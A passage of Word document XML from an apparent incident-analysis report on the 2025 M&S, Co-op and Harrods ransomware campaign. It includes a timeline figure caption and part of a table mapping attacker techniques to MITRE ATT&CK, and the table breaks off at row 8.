      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The data give three analytical observations. To begin with, the roughly eight weeks delay period between the first time of compromise and the start of the ransomware gave the attackers ample time to steal data without detection [15][2]. Second, sequential targeting of M&amp;S (21 April), Co-op (30 April) and Harrods (1st May) suggests that the targeting was not an opportunity but a well-interlinked campaign [4][18]. Third, the timely cross-sector intelligence sharing proved itself to be a strategic measure since Co-op successfully avoided ransomware implementation into its production infrastructure after initiating swifter containment based on the informed awareness of M&amp;S in the public disclosure [7] [19].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CCED47" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2A9046" w14:textId="2EED9A4F" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C458A1C" wp14:editId="0297F2DA">
            <wp:extent cx="6019279" cy="3054350"/>
            <wp:effectExtent l="76200" t="76200" r="133985" b="12700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8"/>
                    <a:srcRect t="11824"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6027191" cy="3058365"/>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2B0F2D52" w14:textId="6B966D31" w:rsidR="006068B9" w:rsidRPr="00C668B5" w:rsidRDefault="006068B9" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig </w:t>
      </w:r>
      <w:r w:rsidR="006B16F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidR="000D0F11" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D0F11" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Gantt chart Incident Timeline M&amp;S / Co-op Campaign 2025. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Sources: [1][3][7][15][17][18]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2799CFF4" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FAEE23" w14:textId="208EB37F" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D3C77" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.  Adversary TTP Mapping - MITRE ATT&amp;CK Enterprise Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D88CF81" w14:textId="6883B117" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Table 2 both correlates twelve essential TTPs with the MITRE ATT&amp;CK Enterprise Matrix [10] using NCSC guidance [7], Mandiant intelligence [8][9], and the work of ReliaQuest and Push Security [5][22]. The distribution of tactics is visualized in Figure 3.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9493" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="460"/>
        <w:gridCol w:w="1537"/>
        <w:gridCol w:w="1306"/>
        <w:gridCol w:w="4938"/>
        <w:gridCol w:w="1252"/>
      </w:tblGrid>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="553C3C08" w14:textId="77777777" w:rsidTr="005143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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B03BC3E" w14:textId="5965634E" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7959571C" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9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ATT&amp;CK ID &amp; Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736FBD09" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B409D1" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35E96108" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>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Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="417AEBF0" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D7EDBB" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30C7C4D9"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T1566.004 Vishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD78F39"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A9E7F1C"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IT helpdesks impersonated; MFA resets obtained via phone. Confirmed at Parliament [1] and NCSC advisory [7].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D7F2352"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[1][4][7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="64A01B75" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23BA2670" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37615EC5"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T1078 Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D7D7B5E"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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41F289C8" w14:textId="04175F56" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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The perimeter controls are completely bypassed with stolen credentials that are used to gain authorization as valid users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109CA62F"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[15][2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="180930C1" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4A5528" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B1D0D2"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T1003.003 NTDS Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BA4FAB4"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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6332B33D" w14:textId="48A54B9D" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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NTDS.dit leaked out Domain Controller; all the NTLM hashes gathered to be used to crack offline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B1321EC"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[15][19]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="6EAD52B9" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A023AC" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218542DF"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T1078.004 Cloud Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10632022"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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45D477E4" w14:textId="5CF66B5F" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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Azure AD, AWS, Google Workspace falsely used, Dropbox/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>FiveTran</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> API connections used to access its data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030840DF"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[5][22]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="01A0407D" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A4B6764" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09CA2C31"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T1557 AiTM Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0E0481"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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CFA540"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roofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Evilginx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>-style AiTM proxy pages harvest credentials and session tokens, bypassing TOTP MFA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290360AB"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[22][5]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="58505604" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD6B002" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762B2A32"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T1486 Data Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70FEB413"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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="764F3D1A"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 xml:space="preserve">DragonForce encrypts VMware ESXi VM disks, evading guest-OS EDR agents and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>maximising</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E8068E"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[9][2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="7AF67E7B" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D00CEE4" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430DC8D6"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T1537 SaaS Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02DE8294"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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D440A29"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 xml:space="preserve">M&amp;S customer PII and Co-op member database exfiltrated via Dropbox and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>FiveTran</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> API connectors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="264688B0"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[5][22][17]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="4530D34D" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="460" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D5F3DE0" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="00EB5A9D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D5AAB2"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T1195.002 Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
